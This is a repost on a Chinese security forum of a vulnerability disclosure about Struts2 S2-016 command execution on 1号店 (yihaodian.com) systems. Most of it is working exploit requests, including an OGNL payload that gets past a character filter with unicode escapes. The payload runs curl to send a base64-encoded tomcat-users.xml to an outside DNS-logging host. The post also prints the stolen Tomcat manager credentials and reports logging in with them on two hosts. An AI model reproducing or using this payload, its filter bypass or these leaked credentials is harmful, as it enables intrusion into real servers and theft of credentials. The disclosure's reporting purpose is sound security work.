HanDs
管理员

[7月漏洞公开] 1号店某系统st2命令执行(防护绕过) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

简要描述:

详细说明:

@lijiejie 的 WooYun: 腾讯移动端某功能SSRF可探/漫游内网(cloudeye神器案例) 提到两个url跳转,一看便知是s2-016命令执行。

http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com
http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218


tms2.yihaodian.com 好像修复了,但3pl.yihaodian.com仍未修复。


POST /system/login_view.action HTTP/1.1
User-Agent: curl/7.33.0
Host: 3pl.yihaodian.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 196
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987
--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:${#application.get('javax.servlet.context.tempdir')}"
-1
--------------------------4a606c052a893987--

1.png


测试过程中发现过滤了一些字符,不能出现 "java.lang"等。
换了个exp,使用java的scriptengine来调用java方法:

POST /system/login_view.action HTTP/1.1
User-Agent: curl/7.33.0
Host: 3pl.yihaodian.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 396
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987
--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:${new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['/bin/sh','-c','curl xxoo.dnslog.info/$(cat /usr/local/tomcat6/conf/tomcat-users.xml|base64 -w 0)']).start()\u003B")}"
-1
--------------------------4a606c052a893987--

3.png


读取tomcat-users.xml获取tomcat管理用户跟密码并发送到cloueye,收到请求如下:

2.png

漏洞证明:

base64解码得到:

<?xml version='1.0' encoding='utf-8'?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users>
<role rolename="manager"/>
<user username="monitor" password="OPS-monitoR" roles="manager"/>
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
<user username="both" password="tomcat" roles="tomcat,role1"/>
<user username="role1" password="tomcat" roles="role1"/>
-->
</tomcat-users>


成功登陆tomcat:

tomcat.png


tms2.yihaodian.com也配置了相同的用户和密码,也登录成功:

tomcat-2.png


修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
1 号店某系统 st2 命令执行 防护绕过
#1楼
发帖时间:2016-7-23   |   查看数:0   |   回复数:0
游客组
快速回复